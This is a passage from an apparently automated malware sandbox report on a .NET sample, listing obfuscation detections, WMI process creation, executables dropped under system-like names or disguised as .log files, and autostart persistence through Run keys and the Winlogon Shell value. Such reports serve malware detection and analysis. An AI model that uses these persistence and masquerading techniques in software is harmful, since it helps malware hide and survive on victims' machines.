Source: W4tW72sfAD.exe, 4v1.cs High entropy of concatenated method names: 'P4B', 'tTbDqDFU56MDNmdIL7d', 'cZnY3oFbrq0SHWBAoNB', 'ixQNYHFjnAxx8jGbXSn', 'rQrteuFWOHPqceLdDCy', 'Qqm8WUF0BDkgp55NIjh', 'xTLvB7FGJaYmoV7ALsb', 'orip4nFmLopfq04du0a', 'j09H4SF63XLuXOmgnmU', 'ILL3O8FapTlGnit9CuC'
Source: W4tW72sfAD.exe, 3rw.cs High entropy of concatenated method names: 'N4R', '_9ke', 'HtShbnCxCMJlEB6QMXg', 'vD9gA6COh8MaqPg6EjE', 'gIwutqC5sCcAJCfkSDr', 'dUQkw8C4oM9Uiv4MeoT', 'tSf8ZhCqPufJa8mWsU6', 'j87BL0CETxXAlmXGOlX', 'K57bHKCzpgL9Eln7j2A', 'ckQnKGFeJR9LnB2uBG3'
Source: W4tW72sfAD.exe, 97s.cs High entropy of concatenated method names: 'Mnm', '_414', 'l54', '_6g7', '_5Xs', '_294', 'xi1', '_66G', 'CAV', 'hjw'
Source: W4tW72sfAD.exe, 89G.cs High entropy of concatenated method names: '_3n7', 'SqgnbLAzRjYtXgemKa5', 'xQJn3hTet66ChXxoPos', 'XdigkDAqXLgNDSeZCgb', 'mfyPDKAER57aNqTBBJC', 'zvZtP6TimuRabtBAx3y', '_27M', 'Fq3', 'EfD', 'QOdRBbA58jxoiQnb2YI'
Source: W4tW72sfAD.exe, 76n.cs High entropy of concatenated method names: 'QD5', 'dCSypbH9BA3eOaywQSj', 'fX8LyQHCXEZDN60qhWD', 'Ercl8EHFHRyYpo1SeMb', 'LfZ0cUHgkrJ30xa5PKm', 'Y24J5AHlNIqOeFuHvxC', 'lIp1tkHHjRB5XwT3uBS', 'kpENWiHs9xLydMJF9hY', 'mUlBcVHZLomWVrQjoiK', 'V2vb7gHATkAcYXGdRw6'
Source: W4tW72sfAD.exe, EO5.cs High entropy of concatenated method names: '_737', 'Z98', 'E4Q', 'ly9', 'ChGV0daUe6uLnVy2TeZ', 'OO1hwBabpTtTRH0jmwD', 'cXjuTca0jFdjuo1bbtj', 'AKnF4taGm6qwhiYHBls', 'a370IyamkoInQ2osVSh', 'qu3JOha6h3jRvrhd1u1'
Source: W4tW72sfAD.exe, 857.cs High entropy of concatenated method names: '_599', 'kf4', 'SJ2', '_736', 'P3r', '_85L', 's31', 'vFqifhZsWY6AZurrb6U', 'MvlIGWZZLn5AkudtWOL', 'XlK5LqZ9dfP7enjeZs8'
Source: W4tW72sfAD.exe, by1.cs High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', '_673', '_8h4', 'KDx7kPCAbqfkL2LW3Um', 'pwvqiLCT35VcEuOOn8k', 'uI0kMcCv2UaLEX0n9p4'
Source: W4tW72sfAD.exe, C9C.cs High entropy of concatenated method names: '_34V', 'y7u', 'PG4', '_7FG', 'gt1', 'xQ8vItNOMrfZDHGXGPn', 'HddjerNqW3Us5pFKYmY', 'rg92rcNEcCBbI1j4X7x', 'UEqiP8Nz02qZhy2d91Q', 'YFZcAw7eJPV2rZd21JX'
Source: W4tW72sfAD.exe, 7YK.cs High entropy of concatenated method names: '_2N6', '_22i', '_239', 'liwnEqgBUaHQPQTWQXm', 'thA7TngpdaSZ9sVppfp', 'mondHBgjJFa1WaQHdkp', 'nZTecSgWr2YuldClLQI', 'MtbdNVgPpdWcbmJBlIx', 'bUu09agJcr5SE67qwYU', 'wNRTNJgU35NQ0sJUsgd'
Source: W4tW72sfAD.exe, 6pX.cs High entropy of concatenated method names: '_966', '_33e', 't8s', '_1Lg', '_127', 'LT8', 'mmGR5qBdPuN0EeUIoea', 'gImtKRBf5mINDvHD2Ye', 'z5eFoxB7Fd1EcRNqy5d', 'zsNMX1BtQpfKwGZoVOG'
Source: W4tW72sfAD.exe, 3Xk.cs High entropy of concatenated method names: 'zf8', 'R9w', '_182', 'G3G', '_75Z', 'E8M', 'vnBMtsKl26tI0hRI9Ph', 'GJlRm3KHLERrucv6i09', 'Axu7wXKA2R628xW4MeE', 'DI3sR3KTye6VUFv7L94'
Source: W4tW72sfAD.exe, Z2c.cs High entropy of concatenated method names: 'B58', 'rye', 'pEfbofS4FjCc7FXm20K', 'zxIsC4Sx7b60AOFxDWl', 'Tie95lSoSB5Skedoatc', 'UWDftNS5K3PsV19dTpy', 'raQg9iSO7CZQZTB7auP', 'Wcml0sSqsM0ran2VOY4', 'eRHhZwSEpfMDcrNpW2J', '_9f6'
Source: W4tW72sfAD.exe, r2O.cs High entropy of concatenated method names: 'uFH0d1Vg58NJgGWUkMt', 'j3FBw2VCScDCdxgTpjp', 'xKqPNFVFtDtYBQAi35O', 'XJCS6QVlfqIk6FTWJAE', 'X16', 'bCppakVvjvDRGnGKE6Q', 'jFuKhJVAZMdigsPpWZb', 'CJA9t8VTWUpoXaMdhBG', '_9S9', 'ailPoTVXooZovOiU1Ei'
Source: W4tW72sfAD.exe, X66.cs High entropy of concatenated method names: '_26F', '_5ml', '_376', '_1r8', 'z89', 'maepmm7Tauw9TpDKsQG', 'UfOhI97vbwy4D7mL7Zs', 'YghXHW7IZYEA9TLjUj2', 'FxLo687hgIk8DILE2Wj', 'sjADli7yZYB66yBvOSR'
Source: W4tW72sfAD.exe, s64.cs High entropy of concatenated method names: '_7P7', 'yt7', '_22g', 'xhGnWLC6wwZpN68WtLO', 'nFF4DRCGKR5AR0fGtge', 'Rc4jBECmCWvkZnJoxgi', 'oY3rGCCabMdiWiOISH3', 'WA2cybCkSA7TpiPbBnZ', 'Pgx9IaCwrONYACrbsxU', 'CTwHm0CYU8XMg7eBSIw'
Source: W4tW72sfAD.exe, 735.cs High entropy of concatenated method names: '_413', 'V29', '_351', '_2Q4', 'H7R', '_14W', '_8h4', 'QSkgPq9xpTt9L7asxuJ', 'fFo5WU9OkBAdeRvekWh', 'JsffSR9qtCD5fGUeud4'
Source: W4tW72sfAD.exe, 2T9.cs High entropy of concatenated method names: 'K77', '_5fJ', 'E32', '_9FP', '_55q', '_8E4', 'V27', 'J8g', '_0023Nn', 'Dispose'
Source: W4tW72sfAD.exe, rG4.cs High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'iSkawnXLIwh7IxNX2OC', 'zA6RtmXQETAwfGY9UwP', 'nm79kTXNNEvGvkNuYvR', 'wxLHXBX7vvRiT1SRkKc'
Source: W4tW72sfAD.exe, r19.cs High entropy of concatenated method names: 'j9l', '_778', '_453', '_5c3', 'hE4', 'z3n', 'N42', 'CwiKKkfdhDyYjMIsunO', 'jbj8tZffg1b5ylHWi2T', 'CYfyvrf7ewb7pngASLk'
Source: W4tW72sfAD.exe, J68.cs High entropy of concatenated method names: 'SB9', 'Z7D', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'a37', '_96S', '_9s5'
Source: W4tW72sfAD.exe, c6y.cs High entropy of concatenated method names: 'v47', 'ACyjwjNihU1gTQY7OT3', 'RYhtwTQzRt3YfG7bdRj', 'ydTo6wNeuA3hySB5jLR', 'y0NOgANs6s9rT9mcNdI', 'ru1UJGNZcZ86JOiDU2l', '_53Y', 'd65', 'e16', 'B2m'
Source: W4tW72sfAD.exe, 39Q.cs High entropy of concatenated method names: '_66V', 'enekxuhSLegjGFwQYro', 'qVvBI7hKXqSq2tDlxLF', 'VBmqPVhcyZIB4a7LHKl', 'GShMr2hrFnO8nvq4niA', 'MQFRbXh1If4m443GkgK', 'o5QqprhDEgMS2iqMimD', 'LnUDQFhoEDx7aetKE83', 'kVylngh5grd6TkyL1r0', 'ICokdsh4fd7JyAHQyZB'
Source: W4tW72sfAD.exe, V66.cs High entropy of concatenated method names: 'rvt', 'K29', '_39k', 'iZ5ZqIBhk2g9Zmu8eah', 'U1Dn4KByhHKm798124B', 'wKuHnPBvssqE3McCNEU', 'tJb6SNBIXA46f0m9whX', 'brw2PYBXH5b8Ag5JiQB', 'btQLqsBLxyILXnfrWlf', 'rDo1B4BQfF3idyIrbRb'
Source: W4tW72sfAD.exe, r4r.cs High entropy of concatenated method names: '_228', '_34p', '_2r3', 'm3t', 'sC3', 'f4cjgEud6hPE6Z7jC4L', 'jymJAYu7JUt5reBGwUA', 'cZgUvTutYNhpeba5nhQ', 'seDSMnuflW9x5r5aRHR', 'pNEmLluu3oZWeFbeqHy'
Source: W4tW72sfAD.exe, Z47.cs High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: W4tW72sfAD.exe, gI2.cs High entropy of concatenated method names: 'G68', '_2c6', '_8U6', '_51G', 'PW5', '_1Fb', 'w5y', '_1FB', 'KXm', 'fE5'
Source: W4tW72sfAD.exe, k9J.cs High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: W4tW72sfAD.exe, 6m2.cs High entropy of concatenated method names: '_866', 'oy5', '_536', 'B6NghXgy7N5IU2L234G', 'cVgCMAgXWTKTDjcuQix', 'kDaYmlgINRPGCLEDKlG', 'tLvfwughP4FMqndlx6k', 't0HKS7gLjb99PJAYvQx', 'g2r', 'h95UZxgt472MeBv1a3i'
Source: W4tW72sfAD.exe, 7p8.cs High entropy of concatenated method names: 'k6u', '_13E', 'SoH', 'cyxgFFZPA5rQgCJxeNr', 'rferiJZVUbxiWJFXGFZ', 'hbpay4ZMcVsnxYe2RjA', 'SWZFR2ZJgJQXp4p51Dn', 'zOjDNfZBKjbc82Xu5M1', 'rs9ryaZpa9tEqNXlwkl', 'Q22kLPZjAG73PtpgSpm'
Source: W4tW72sfAD.exe, 386.cs High entropy of concatenated method names: 'Mic', '_7c8', 'WP9', 'EOG', 'dwE', '_397', '_4G4', '_6tB', '_16b', '_553'
Source: W4tW72sfAD.exe, cvm.cs High entropy of concatenated method names: 'M98', 'Kr8', 'DXB', 'o21', '_256', '_995', '_8oE', 'ZlJ', 'WEz', 'm51'
Source: W4tW72sfAD.exe, l65.cs High entropy of concatenated method names: 'c3G', 'V29', 'u9l', '_2Q4', '_78M', '_322', '_8h4', 'wBSEkT9VCvXltqaIRs4', 'Qgd87m9MsFNEEjf1lLk', 'cTW11x9PxBZOLX43U0i'
Source: W4tW72sfAD.exe, q2i.cs High entropy of concatenated method names: '_7O6', 'o8v', 'gkM0FMvPfnhHBD5LFaT', 'pZBcOCvJYrSBkovKMuV', 'WcVaZ8vBLhPCJJeV40O', 'GWLFJcvVQAVCwPwrNZJ', 'iqlCUevMYOtKwv5mDp6', 'iVXbNavptn41uQF2KKX', 'j0QsjRvjjj1JksLFQYL', 'wt60fHvWZsFhaBWKgch'
Source: W4tW72sfAD.exe, W58.cs High entropy of concatenated method names: 'aE3', '_42V', 'MTrSr6vFa7FIBrRR2ft', 'oXFQhUvgQnnXM3bV7qf', 'WNj2H6v965rJElw4oIC', 'LkFnQivChwUY4MkPAmt', 'um9uEpvlgwLvvCVn405', 'd1g', '_171', 'u6E'
Source: W4tW72sfAD.exe, 52Z.cs High entropy of concatenated method names: 'o19', 'box1nVA9h1QSs7sqa32', 'kvOCT6ACiQLdhC4fArq', 'M0a2kSAFkgxoAMUioQv', 'u8xYIYAs5qUIGvemMmd', 'ucaqUUAZU2mdKvbg8Dh', 'TitP36AAqShhphcaJEh', 'v3VwQRAl0s6FBuyUt9w', 'lWt7XbAH0GUJZjyXDKT', 'QFIqkXATNVXGZliwf62'
Source: W4tW72sfAD.exe, z8y.cs High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'K17', '_8h4', 'RCEcv6CueCRlGjwD6Py', 'GEUNj2C8n7JHGyS29p5', 'I1HeSkC3K1DcjGYUn5F'
Source: W4tW72sfAD.exe, QTu.cs High entropy of concatenated method names: 'g49', 'Dph', 'P3C', 'newDOhygBvTYr2YP5EN', 'HVFQVdylO4ZGY2tFZB9', 'jEFYOUyCfuG1duVIh3i', 'A2fCoyyFlq5AKfsUTef', 'hkQnh1yHwfL8CbQo9Ny', 'sTCphjyAdu9fdRAXqmF', 'C3BgqnyTqmZM7amgZEg'
Source: W4tW72sfAD.exe, 1o7.cs High entropy of concatenated method names: '_4FP', '_141', 'Snm', '_156', 'jfh', 'zIhg3p7084kuBrmwJpQ', 'grm9Qo7Ghl1Z3SlkCn7', 'EYvBCY7mtrVZyEP5yrj', 'iV42KQ76OW79Tuyqygj', 'QZOXCP7aci4PFmMrXxo'

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File written: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\hSShNgSi.log Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\yzZxaXSF.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\NWsvAoLz.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\nweImycr.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\eSWSCFMK.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\VRHDyDUj.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\quERYeDq.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Public\Downloads\RuntimeBroker.exe Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\fAbTigaR.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ekLJkSsv.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wHsyCTFf.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\LionObPB.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\EkAnmMVM.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\rrfZteSl.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ZpKsdnCB.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\GNRoGDmH.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\kdoiNyxj.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\QwkEqgro.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\HScOGmcH.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\DEgxfiAU.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BazpdGXT.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\cnkBPSdA.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\ndjISZpy.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\JNNDResf.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wexYWbhZ.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\NEEtYbtY.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files (x86)\Internet Explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\IhtNKAXm.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\WoNdSLwd.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\oQGhqvNX.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\UMwcyUfj.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BuKwfPUT.log Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\cnkBPSdA.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\NEEtYbtY.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ekLJkSsv.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\JNNDResf.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\kdoiNyxj.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\hSShNgSi.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\ZpKsdnCB.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\IhtNKAXm.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\yzZxaXSF.log Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\oQGhqvNX.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\NWsvAoLz.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\EkAnmMVM.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wHsyCTFf.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\ndjISZpy.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\fAbTigaR.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\VRHDyDUj.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\UMwcyUfj.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\LionObPB.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\DEgxfiAU.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BuKwfPUT.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\nweImycr.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\eSWSCFMK.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\WoNdSLwd.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\quERYeDq.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\BazpdGXT.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\rrfZteSl.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\QwkEqgro.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\HScOGmcH.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\GNRoGDmH.log Jump to dropped file
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe File created: C:\Users\user\Desktop\wexYWbhZ.log Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Creates multiple autostart registry keys
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to dropped file
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run juptXkyeRvGsIZrQGeVEsrnWhD Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
